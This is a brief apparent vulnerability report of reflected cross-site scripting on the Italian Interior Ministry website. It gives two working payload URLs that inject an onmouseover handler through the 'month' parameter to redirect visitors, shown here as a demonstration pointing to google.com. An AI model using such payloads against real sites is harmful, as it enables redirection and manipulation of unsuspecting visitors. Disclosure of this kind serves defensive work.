various characters are replaced but the xss is still possible and we can redirect the user where we want to. The xss is triggered by the onmouseover on the available images. In this case we send the user to google. XSS http://www.interno.it/mininterno/site/it/sezioni/sala_stampa/gallery/2010/0934_maroni_in_visita_al_cairo/index.html?month=5%22%20onmouseover=%22location.href='http://www.google.com'; same problem in other pages of the website http://www.interno.it/mininterno/site/it/sezioni/sala_stampa/gallery/2010/0934_maroni_in_visita_al_cairo/9.html?month=5%22%20onmouseover=%22location.href=%27http://www.google.com%27 Note: we can also change the stylesheet and do other things.This is just a sample.